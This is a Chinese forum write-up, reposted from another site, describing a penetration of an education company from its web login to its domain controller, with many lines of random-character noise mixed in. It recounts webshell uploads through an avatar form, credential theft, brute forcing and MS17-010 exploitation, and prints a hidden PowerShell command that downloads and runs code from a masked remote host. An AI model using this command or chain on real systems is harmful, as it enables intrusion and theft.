|
5 q6 ?3 [; p* E' U9 U( y- _
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
+ N. o9 R0 D1 l8 ^, |4 b1 t 0 } S2 Q) H* R6 Z' w+ F
, J I0 D; i, D+ [! y3 l- N) T& z9 y 1 i( S; i& N7 @0 _" f
0 ~+ c5 _) \) n9 t6 x2 K
( P( s9 i+ Y3 U Y/ T/ E
正文+ T9 e/ g. H7 N
h5 {# p0 z1 `# ?3 @+ z- I
# F( {7 s3 r9 p [. b3 A; N# k
9 i1 m; J) ?/ Z* a: M
g% J3 ]$ f3 [6 ^; R7 ]' J
4 [" h2 t4 l) |5 I$ } 目标:www.xxxx.com(一家教育机构)
. A7 H5 J& \+ O7 S8 H1 _9 f: C/ p打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能0 d+ o7 S( C0 G+ y9 |7 i b
3 e X8 M0 Y) l- @. h" o2 Z$ w$ g' D; S0 }$ o* W, U) {% @
( Y0 d. K, ^6 p9 K# p* t {
1 [2 W# b+ {7 }7 m5 e$ r9 Y' J* Y: B9 A4 C+ ^
进行了简单的信息搜集
7 w% \8 p+ C0 p! n( D! B
$ c Y& w! ~) @9 H4 o2 ~( q- K& h
) ~* H( x4 T9 m! @5 X- g, f) D2 p
) J1 {2 }; ]8 f 子域名搜集& H4 z) l q R$ h/ }' ^/ R
1 X0 R5 W( c/ E! H \* R7 w
2 ~# N0 [ Z! y" K
. i% ?3 k9 o9 H. c. {# D * s3 Z+ `" ~- v
9 t% ]$ ?$ W$ {& s
fofa找资产
; p( }5 }: U7 T4 c: w/ J% d
& @* i0 A5 w/ b% E2 a8 l% N5 K
. C2 `" i8 Z/ M' {& A. _ $ C/ p5 F+ | Z# R( Y% f, B. N1 E
0 m9 d+ v9 V {/ k4 z( g
9 X0 Q9 J3 Q k+ |7 F
5 v* z; @& g8 i, \' A# y( p
" b- ~5 }; I: M& g7 i
一共七个资产。去重之后只有两个。
/ ?/ y0 V; z/ q. X6 \; \ + c. G2 @" D* E& ~0 B# y
V. B1 T% {% A5 o6 L $ c6 I% J F9 U4 @: [3 y. ]
9 Z, ^: }, l. D3 C' Q1 x+ ^
目录探测
+ D8 N' o$ I' b6 G9 V 2 _4 c! E$ j1 X4 p; b$ \
! Z" c# ]( S |) } , `, x1 ~/ R+ E& R1 F P4 M* k
# ]. y% J4 w! y! x, p/ J7 {0 o4 k" Y0 t- K; X+ p+ Q
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
6 E6 X) D- R- B9 w h' \9 T& Q , c; M( h% K' C5 X% v1 S5 V6 n
" m( @/ D9 z, s) `: S0 a 7 ~/ W; G8 ^/ m$ r: Q' |1 x& C
" ~4 _. P0 M$ b5 w 我又尝试了通过修改返回包来绕过登录界面
& [; _4 j4 ^4 @# _. `. v ) }( {& l7 _( B
* O+ O7 _! `% S$ x
7 t# c& R6 e. ~2 ?# f8 Y
- f8 y2 F! j M( p8 H8 F7 {# J( x" u1 k# _: ?- [
还是不行,尝试注入无果 O8 i e6 M1 r
" c5 X& G. q+ b: z& `( V
% q9 I/ U) L5 u# e- g3 e% v4 y
$ W' c" e! c4 L$ p2 s : t2 H/ N( G1 }4 ?
! V, k# g7 K* T$ n* I 不过我目录探测出了一处Spring信息泄露
$ B' b2 p# n3 S0 c; C9 m# @ 8 d. f# M* ?2 x1 R/ Y
5 ]& Y( k2 ~9 @1 G4 k / T5 y8 k( w0 M" C' W
+ v0 g6 Z/ C2 N5 u7 L
6 O0 }, _5 a5 O' g+ ^( `
8 ], d" h. i J( d$ P. N+ D* ~4 I# ]) G: \) J7 a+ |
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录4 F8 e7 P' Z% U- G1 _
* ]! ~' A* F2 A* A# O6 S6 s) D% U1 _ G- b5 C- A1 ^! e
9 {2 m- ^3 |5 p4 E% V9 ?
* a$ X: P& ~" J3 s8 R- M: j5 `" H
! m, L1 d' ~& k* a" A& P: P# A 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。! f0 B2 o0 t/ j" B! M$ C; `
3 u5 Z0 P9 J" _6 w7 [
9 a) `1 A, u P6 I0 Y, z8 Q , W, L D" T0 @+ Z# T
f7 N, A p4 g# C% a% f; {
* F8 N8 b' [9 b; h* n
获取有些师傅到这一步就手机抓包电脑测了。0 t5 L+ S/ i9 y4 ]! ~
1 f( C7 [ ` Z, F
6 |. U5 s0 W4 ^
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。! [) A$ { d* {- t
2 X# _ ?# L0 d7 j* ^3 `& B) Y8 h. ^
( ~: ]9 m$ E; p. o; q3 ~! U
其中在一个公众号发现了小程序,可以进行注册。
! X7 ?' K! m/ n9 u5 d 6 j( l' C* w( q$ x% ]
8 A3 U* @2 y7 ?" R5 b+ Q8 L8 D 看到了头像上传,尝试上传获取WebShell
( p. e4 c; ^' E( |6 J' }/ C1 K
, a1 ?1 R, N S+ P2 u) g) H- {- `: F" ?
9 }. Z1 |3 o. _* X2 a6 `% x) e, ]
# D( m; ^- B" e6 Y+ ?
2 r+ s l1 w/ J& x `3 F# ^- X 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
6 @& p* `# q: |; [ % i, I* A Q( u$ u4 J/ D2 C' l+ k
/ N. @" o6 ] F( v' C5 Q
( @/ `$ a: V d) e+ ]4 S8 Y1 D 2 r ^8 Z+ ]: j6 D, _
" I) b* c; O. n2 W( t; N/ g! Z. X- j
然后上了大马% X" G) E% h( n6 T
/ S2 W) S# E9 Z- ?+ z1 I5 T- M3 |
/ N u5 D5 ^, u( H/ x6 O. x$ q
G, R9 Q$ H7 m. L- g
9 @/ B0 F" W1 s4 q* s" ], u5 Q7 u. U2 A1 Q; ~2 ^
( I" D( n8 F8 H' b + V' B8 w$ s- {$ M- B. \+ O0 U
2 H* h" U5 X6 W# |1 [5 k
通过翻找文件发现数据库账号密码
' Z8 h% Y; B# E: O
7 d8 h/ ?; L8 R5 Q( e/ v9 [/ z; A1 y) |" }" S
; k( k; M4 O/ A" m
4 d9 j* w' i4 {* \' {7 E! [: d! I, K0 x# v/ x
--内网渗透
+ P7 u! L/ z/ ? 6 s- a6 `5 ?& E* E9 }( a+ D: }5 }
$ I7 h4 l: C8 v" |( h; V 直接通过powershell执行 cs上线
: p8 g7 u" s. _# `7 Y5 I `# J' N
/ q, D0 V# H$ Z2 p2 @! D9 M; u) M0 k& ?5 q) J7 }- e
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
# C7 U; M( U% J7 m- b) m - ^4 w* U- E$ |/ Y; ^* v
& o9 R5 m( f9 }
" ]6 {$ N! t! c# K1 ~! I! o1 Y
8 ^* c! U4 n5 N. L% G7 u6 z) h
7 i: e( n" J8 ^3 p$ m* F0 \) @9 _
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
: X; ?1 N ~6 Z( V4 N$ h- y, C - H; D; I# R% j
9 n Z3 E- `# j5 [) S ! Y8 j1 G# a3 K; K9 l+ }
& a5 Y X+ [8 l+ J* d
% O: J- H \, c& |( ^+ F$ j
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 / L# \3 Y; G1 ~" P, W' q! k2 c& k
/ Z& p' f% K: t
8 g- q% Q% J4 ~9 @) P! D$ G; Z: w6 j# Z3 [0 A" T! L
8 `/ d: t2 k0 t s- z4 V
: r# k( ]. I/ k. S
. _$ a5 j: U1 U
7 E& A9 c. Z1 l8 u; \0 ]2 K/ G, b6 g" V
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 , ~3 j1 h a; Y9 }
, z" s$ s4 g$ |0 _$ q w1 W- X* f# c' M4 e+ g+ o
& r# n( `: C6 D* `8 _
: g: C$ [0 e9 w. W, M
8 ?* i% N, ]- W7 L9 q
1 n1 U0 i0 k& V% l5 J. x
( j/ R2 [& P) ~0 A$ g + j& k/ E' l' r* x Q8 M. z
$ z, |" U" E! K. v( ]# y; y7 x2 u: w/ F1 M& ~7 N; [1 G
/ T7 F, {6 T( F$ f# m6 T8 a5 t7 U- A& n! }7 t
9 f" ~ c, `2 M% A - _4 A: k3 p( O3 Z/ d! f
9 Y- O1 F. `2 z3 B1 u& Y' @ K! n: b 小结
3 K4 b& Z$ C7 E; S. D% j/ l
2 B s1 o5 J3 W z) W
0 |9 \% \, ?4 W: f- T9 n 5 Q$ R4 ~* Q) b' L/ I" k- {% U5 S
$ H) T: d/ ~3 v0 H- J6 s: S
$ q* u6 ?% t3 a# _% i+ T- ?$ _9 D 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
( o. \" i; a0 [% \, _6 K$ Z # `" P4 v Z" h m" k# h
9 C# O: z7 [3 q( P
3 A8 j1 n" X' T: |
3 ]: i1 ]6 J2 h/ H* E% c5 U9 R- i6 A1 @& {
-
( G0 E8 P9 D" o6 U4 Q* y& [
9 U# |4 y2 }' W0 O, c2 [
; s- o1 G8 ?+ [1 ~& n6 `6 ~% [0 e
-
7 b$ a& @ D% z! p- |2 r8 }
$ u* P9 b F* Q& r
0 `4 j3 m8 U! ? I" b1 z2 A
8 Z, Z6 f4 @8 ~ O# S! ?- r) x, d4 A3 V1 C) l% X, x. o
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html1 Y0 j2 F2 r& t" N' m
7 R+ M, ~" r: Y" w0 m& d! X) M- W' }6 p2 [; D0 q/ o
5 `4 |3 h0 q+ ? V |